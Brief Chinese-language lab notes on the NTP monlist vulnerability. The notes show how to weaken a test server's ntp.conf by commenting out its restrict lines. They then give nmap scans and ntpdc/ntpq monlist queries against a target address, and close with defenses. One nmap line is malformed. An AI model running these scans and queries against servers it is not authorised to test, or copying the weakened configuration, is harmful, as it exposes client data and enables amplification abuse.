网络时间协议
客户端查询时,NTP服务器返回最后同步时间的600 个客户端IP
-
攻击实例
ubantu:apt-getinstall ntp
netstat -tulnp |grep 123
vi /etc/ntp.conf
# restrict -4 default kod notrap nomodify nopeer noquery limited
# restrict -6 default kod notrap nomodify nopeer noquery limited #把这两行注释掉
/etc/init.d/ntp restart
nmap -sU -p 1.1.1.1.0/24 --open
nmap -sU -p 123 -sV 1.1.1.1
发现漏洞
ntpdc -n -c monlist 1.1.1.1
ntpq -c rv 1.1.1.1
ntpdc -c sysinfo 1.1.1.1
防御
升级到 ntpd 4.2.7p26 及以上版本(默认关闭 monlist 查询)
- 手动关闭 monlist 查询功能